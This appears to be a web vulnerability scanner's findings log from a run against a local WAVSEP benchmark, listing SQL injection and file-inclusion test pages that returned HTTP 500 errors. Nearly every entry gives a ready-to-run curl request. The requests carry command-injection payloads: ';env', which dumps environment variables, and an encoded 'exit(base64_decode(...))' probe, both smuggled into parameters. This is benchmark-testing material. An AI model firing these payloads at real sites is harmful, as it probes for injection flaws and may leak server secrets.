curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp?msg=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp?username=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp?username=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msg
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp?msg=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp?msg=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp?transactionId=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp?transactionId=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp?msgId=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp?msgId=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp?minBalanace=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp?minBalanace=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp?msgid=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp?msgid=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp?transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp?transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp?transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp?transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp?transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp?transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp?transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp?transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp?transactionDate=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp?transactionDate=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp?transactionId=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp?transactionId=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp?msgId=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp?msgId=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp?minBalanace=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp?minBalanace=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp?msgid=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp?msgid=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case01-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnIvFailure.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case01-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnIvFailure.jsp?username=%3Benv&password=textvalue2 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case01-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnIvFailure.jsp?username=%3Benv&password=textvalue2"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case02-FalsePositiveInjectionInLogin-PsAndIv-500SyntaxErrorOnIvFailure.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case02-FalsePositiveInjectionInLogin-PsAndIv-500SyntaxErrorOnIvFailure.jsp?username=%3Benv&password=textvalue2 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case02-FalsePositiveInjectionInLogin-PsAndIv-500SyntaxErrorOnIvFailure.jsp?username=%3Benv&password=textvalue2"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case06-FalsePositiveInjectionInLogin-HoneyPotNoSQL-Fake500SyntaxErrorOnIvFailure.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case06-FalsePositiveInjectionInLogin-HoneyPotNoSQL-Fake500SyntaxErrorOnIvFailure.jsp?username=%3Benv&password=textvalue2 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case06-FalsePositiveInjectionInLogin-HoneyPotNoSQL-Fake500SyntaxErrorOnIvFailure.jsp?username=%3Benv&password=textvalue2"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case07-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnUnrelatedSyntaxError.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case07-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnUnrelatedSyntaxError.jsp?username=%3Benv&password=textvalue2 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case07-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnUnrelatedSyntaxError.jsp?username=%3Benv&password=textvalue2"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

